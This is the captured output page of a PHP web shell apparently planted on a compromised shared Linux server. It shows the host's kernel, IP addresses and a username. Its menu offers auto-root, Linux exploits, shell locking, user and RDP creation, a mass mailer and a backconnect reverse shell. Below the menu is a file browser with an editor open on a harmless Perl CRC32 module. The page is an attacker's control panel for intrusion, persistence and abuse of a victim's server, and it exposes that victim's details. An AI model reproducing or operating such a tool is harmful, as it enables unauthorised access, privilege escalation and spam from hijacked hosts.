Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
x86_64-linux-gnu /
perl5 /
5.34 /
String /
[ HOME SHELL ]
Name
Size
Permission
Action
Approx.pm
25.12
KB
-rw-r--r--
CRC32.pm
344
B
-rw-r--r--
CRC32.pod
1.6
KB
-rw-r--r--
Similarity.pm
2.07
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CRC32.pm
package String::CRC32; use strict; use warnings; require Exporter; use XSLoader (); our @ISA = qw(Exporter); our $VERSION = '2.100'; # Items to export into caller's namespace by default our @EXPORT = qw(crc32); # Other items we are prepared to export if requested our @EXPORT_OK = qw(); XSLoader::load( 'String::CRC32', $VERSION ); 1;
Close